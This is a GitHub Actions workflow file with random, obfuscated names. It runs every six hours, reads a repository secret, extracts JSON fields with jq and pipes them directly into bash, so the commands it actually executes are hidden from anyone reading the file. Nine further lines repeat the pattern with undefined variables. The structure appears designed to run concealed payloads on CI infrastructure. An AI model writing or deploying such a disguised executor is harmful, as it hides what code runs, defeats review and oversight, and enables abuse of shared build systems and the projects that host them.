name: haoertong6352
on:
  workflow_dispatch:
  schedule:
    - cron: '44 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: haoertong6352
        env:
          c07446: ${{ secrets.c07446 }}
        run: |
          echo $c07446 | jq -r .vvfo33226 | /bin/bash
          echo $t930 | jq -r .bnm799 | /bin/bash
          echo $yunwd1 | jq -r .xnxv43 | /bin/bash
          echo $wg116 | jq -r .gdc0609 | /bin/bash
          echo $ru900 | jq -r .ujz73829 | /bin/bash
          echo $msvi76 | jq -r .rhrn99 | /bin/bash
          echo $uwyny7554 | jq -r .jtinj6 | /bin/bash
          echo $nibc78 | jq -r .wqb96 | /bin/bash
          echo $vlrt665 | jq -r .cso13 | /bin/bash
          echo $tr1 | jq -r .ht7683 | /bin/bash

